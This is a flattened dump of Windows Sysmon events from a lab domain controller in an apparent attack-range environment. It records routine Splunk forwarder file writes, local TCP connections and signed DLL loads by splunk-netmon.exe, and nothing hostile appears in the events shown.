AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F833C4F75AEE16DE27703B847C9C93A,SHA256=A141E882EF661C90446AC32A98DFF50683EA258ECEAF30C712BECBE13F7101A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:13.078{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53311-false10.0.1.12-8000- 23542300x800000000000000098519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:17.838{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9FCFCECBCA616CE5B87CDC0AD18D184,SHA256=97CFA1D08519310453315189F0E41066D6496A962B679300C86FEA4E87704389,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:18.931{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4C46E834455A984ADCBF7B0AB6027FB,SHA256=2DFDFD2ED22303222753CF3A2716CBE487AF17A4EE648A29125EFE5CA198A1AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:18.353{326FD73D-A44C-6294-0501-000000005502}5164NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=2DDB2F76134BB4CCACA34D03A0FD7B93,SHA256=881F8670E05A51CE1019CB7B36D1BB2CF0565B6AF6ADF723ACFE2C6ADA3ABAEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:19.072{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=789378AE5D6DBC9DDBDC4E278D612DC3,SHA256=CE99020FED46A779F35AF7E535DD435A6CFB1D68279082587E3BA07728D61CF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:20.025{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C43FE991F940A320E9470AA57F59EFF4,SHA256=42AB88F9C9E51E4DB70121583AEE665B812F593E00D33AF7664AE1A21B4E7E15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:18.093{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53312-false10.0.1.12-8000- 23542300x800000000000000098524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:21.119{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38096C21D4B961AF90ED79A2FCBFB195,SHA256=875DE63D16F269ED2586B07B21DA908EDEA5F777436C03936C6AF1266084BC70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:22.213{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB9232CCA27D099C119FE2A08D60596E,SHA256=04C091959DF545819A0C6BC150A5FA3CE1DBC2CD77DB6D9B60119518D1D4CDFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:23.634{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:23.306{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AA65350AC0D3A767C26EF3D52FB305,SHA256=F5C748546E7B7C4ABD6BD639A47F11207D5FA037585656C5DE403E55EA41C7D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000098530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:21.530{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53313-false10.0.1.12-8089- 23542300x800000000000000098529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:24.400{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E695B45178C25D7B371B69C2D9E0C03C,SHA256=D64B6B434AEA4B213B390D62E30B8F530118557D9CFC71A5B495398C9F97FA19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:25.494{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CEF17A995A8BCC0F096C9E3A0FCE2F4,SHA256=247C119074EF5C4B299DDC68D7BFFA759659694A13A18F82911D9073B4332B4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:26.587{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEBF729C1A2D123377DA0D7C348A8DB8,SHA256=24844F51732181C683292774DA2EEC6D180F2AC1B7BA63BA61FF682C140180D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:27.681{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D0171110ABD3919A492F159E9A91CA1,SHA256=4A66D78D9E631D587615A2A4204B8B2746244B0551FA9DA4323876214F366F72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:28.775{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08275C56CE398DBCC62B5948860A40A6,SHA256=844CB72AB46872968D2B4D0D0A9C56D69A5DB12E814F4EC8286F6C009BA9D7F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:24.046{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53314-false10.0.1.12-8000- 23542300x800000000000000098536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:29.869{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=290E66ABB2C5BB8442CAC50D4AA13598,SHA256=D33BD1636176F8C4351D545B01D83B34713B1A92D6D4917AF9A9306F7BD34701,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:30.962{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79CB18B942C9E4638BB7A586809359AE,SHA256=1273BCC5AF5CEF9F45ED3CEBA375CAFB4C9A17EE132F5E568929F7069A17B42A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:32.056{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AD9A8469E3BF06F030A7E353B34ECFA,SHA256=968A9DBBEAF658354C1B9055C68AC3EF9B7D2D88D0BD68BA2EFD1C1AE2E52114,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:29.061{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53315-false10.0.1.12-8000- 
23542300x800000000000000098539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:33.166{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C42BDB6D2A01991F44D9905FFAD3928,SHA256=21AC60E1236BEC9E32FB56E6DE54857BC63D2581A30E6BF1C8C0AD565C782705,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:34.259{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAFC3D0C9BBEACA1E28B661254CD032,SHA256=7992C8B9A24D33F640FAC350502FD70A4E2BF7D3BB4269219E861DCFB46428D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:35.353{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA89AAE95E279E0DCC1795FEF226D846,SHA256=35ECC73449180F351DAFB8BD798698AD8E4C6B53DFAA77CC8BE14139ADE63B9E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:36.447{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDA8F3903E5736150B2CE83FFF0E124,SHA256=86C84B1E1C2900EC80208FFF6DF2A9C3750E3DD9C97E6DF168A0964F622F55B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:37.540{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D6C361A2738F446D89B876234B87C24,SHA256=D1EF77FFAD4EE1369D6B036BFD8D02FEDF484EB6A401AEAB8093DFF55E70328B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:38.634{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0424E29183B4F3F9B39019653DF09DF,SHA256=3A4F22B46D3C10055EAB968F8CA8D00287816FB9BD979B6C1BE44A4CB87CFA80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:35.030{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53316-false10.0.1.12-8000- 23542300x800000000000000098547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:39.728{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8818B7987C882A2FEF57B7915265E76,SHA256=ABB336FB5DDE91FC70A1B0C4240ED14634FC385B77E440D0330DDF5B1E3931CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:40.822{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E85763F28AEEE220EDD2FBCC8C3FFE,SHA256=0A0BF4785636298DD22E4B97F66BC6D5BEE2903CC932F233B074FD1F4186FEA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:41.904{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43B86B99FCE2048A7E00141D484EFC6,SHA256=7A5D48DAC8386B31C1A56FE6684AA8ED3046C8466DF13C562E21AC4E719D67D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:41.795{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 
734700x800000000000000098646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, 
http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program 